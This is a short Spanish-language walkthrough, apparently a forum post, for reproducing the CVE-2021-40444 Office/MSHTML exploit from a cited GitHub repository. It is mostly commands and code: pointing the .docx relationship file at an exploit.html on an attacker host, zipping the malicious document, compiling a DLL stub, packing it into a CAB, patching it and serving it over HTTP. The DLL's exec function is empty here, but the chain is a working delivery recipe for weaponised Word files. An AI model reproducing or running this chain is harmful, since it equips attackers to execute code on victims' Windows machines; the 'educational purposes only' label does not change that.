Solo válido para motivos educativos
Fuente: https://github.com/lockedbyte/CVE-2021-40444
Generando el documento .docx:
Ir a maldoc/word/_rels/document.xml.rels y editar los textos http://<HOST> con el URL del archivo exploit.html
Luego se genera el documento .docx
Código
cd maldoc/ ; zip -r maldoc.docx *
Generar el archivo dll
Código
#include <windows.h> void exec(void) { return; } BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) { switch( fdwReason ) { case DLL_PROCESS_ATTACH: exec(); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; }
Compilar:
Código
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
Instalar la dependencia lcab
Código
sudo apt-get install lcab
Código
cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab
Copiar el archivo out.cab en el directorio www/, modificar exploit.html para apuntar a http://localhost/out.cab
Ejecutar el script: patch_cab.py
Finalmente crear el servidor:
Código
cd www/ ; sudo python3 -m http.server 80
Parte final
Ejecutar maldoc.docx en una Máquina virtual.
B#